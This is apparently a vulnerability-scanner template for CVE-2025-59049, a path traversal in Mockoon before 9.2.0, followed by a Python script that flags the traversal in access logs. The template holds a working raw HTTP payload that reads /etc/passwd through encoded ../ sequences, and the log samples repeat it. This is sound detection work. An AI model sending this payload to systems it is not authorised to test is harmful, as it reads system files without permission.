Vulnerability Description
Mockoon before 9.2.0 contains a path traversal and local file inclusion vulnerability caused by unsafe templating of server filenames from user input, letting attackers read arbitrary files on the mock server filesystem; exploitation requires a crafted request.
id: CVE-2025-59049

info:
  name: Mockoon < 9.2.0 - Path Traversal
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Mockoon before 9.2.0 contains a path traversal and local file inclusion vulnerability caused by unsafe templating of server filenames from user input, letting attackers read arbitrary files on the mock server filesystem; exploitation requires a crafted request.
  reference:
    - https://github.com/mockoon/mockoon/security/advisories/GHSA-w7f9-wqc4-3wxr
    - https://github.com/mockoon/mockoon/commit/c7f6e23e87dc3b8cc44e5802af046200a797bd2e
    - https://nvd.nist.gov/vuln/detail/CVE-2025-59049
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-59049
    epss-score: 0.06224
    epss-percentile: 0.90472
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    vendor: mockoon
    product: mockoon
  tags: cve,cve2025,mockoon,lfi,path-traversal,vuln

variables:
  static_dir: "static"

http:
  - raw:
      - |
        GET /{{static_dir}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: content_type
        words:
          - "application/json"
# digest: 4a0a0047304502207ecd37316188a55455cc6598e8e6e8dd3f10fa96f68e754e713fc259e791b0ec022100b7b34a39cbc7f835747aa5457e01dda881dd9ad472c290cff3bc876e606802e0:922c64590222798bb761d5b6d8e72950
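As an added defensive example (not part of the advisory, the template, or Mockoon's own code), the following Python flags requests to the static route whose percent-decoded path escapes the static directory, run over constructed access-log lines that include the encoded traversal path from the template above; the log format, client addresses and function names are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed access-log lines (not from the advisory); the first carries the
# encoded traversal path used in the template above, the others are controls.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2025:10:00:00 +0000] "GET /static/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1821
10.0.0.6 - - [01/Jan/2025:10:00:01 +0000] "GET /static/app.js HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2025:10:00:02 +0000] "GET /static/%2e%2e/%2e%2e/etc/hostname HTTP/1.1" 404 0
10.0.0.8 - - [01/Jan/2025:10:00:03 +0000] "GET /api/users HTTP/1.1" 200 230
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def fully_decode(path: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable, so ..%2f and double-encoded variants are
    compared in the same form the file-serving code would see."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def escapes_static_dir(path: str, static_dir: str) -> bool:
    """True if a request under /<static_dir>/ resolves, after decoding and
    '..' normalisation, to a location outside that directory."""
    decoded = fully_decode(path.split("?", 1)[0]).replace("\\", "/")
    base = "/" + static_dir.strip("/") + "/"
    if not decoded.startswith(base):
        return False  # not a static-route request; out of scope here
    resolved = posixpath.normpath(decoded)
    return not (resolved == base.rstrip("/") or resolved.startswith(base))


def flag_traversal(log_text: str, static_dir: str = "static") -> list:
    """Return (client_ip, raw_path) for every static-route request whose
    decoded path escapes the static directory."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and escapes_static_dir(m.group("path"), static_dir):
            hits.append((line.split(" ", 1)[0], m.group("path")))
    return hits
```

Matching on the normalised path rather than on a literal `..%2f` string also catches the `%2e%2e` and double-encoded spellings of the same traversal.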